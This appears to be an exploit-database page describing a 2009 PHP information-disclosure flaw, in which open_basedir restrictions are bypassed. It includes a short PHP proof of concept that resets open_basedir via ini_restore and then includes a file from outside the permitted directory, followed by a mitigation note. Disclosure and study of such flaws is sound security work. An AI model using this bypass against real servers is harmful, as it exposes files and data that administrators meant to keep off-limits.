header-logo
Suggest Exploit
vendor:
PHP
by:
SecurityFocus
7.5
CVSS
HIGH
Information Disclosure
200
CWE
Product Name: PHP
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
2009

PHP Information Disclosure Vulnerability

PHP is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. The vulnerability is caused by the improper handling of the open_basedir directive. An attacker can exploit this issue by including a file from a directory outside of the open_basedir directive.

Mitigation:

Ensure that the open_basedir directive is properly configured to restrict access to only the intended directories.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/36009/info
 
PHP is prone to an information-disclosure vulnerability.
 
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. 

<?php
ini_set("open_basedir", "A");
ini_restore("open_basedir");
ini_get("open_basedir");


include("B");

?>

Navigation

Suggest Exploit

Services By CQR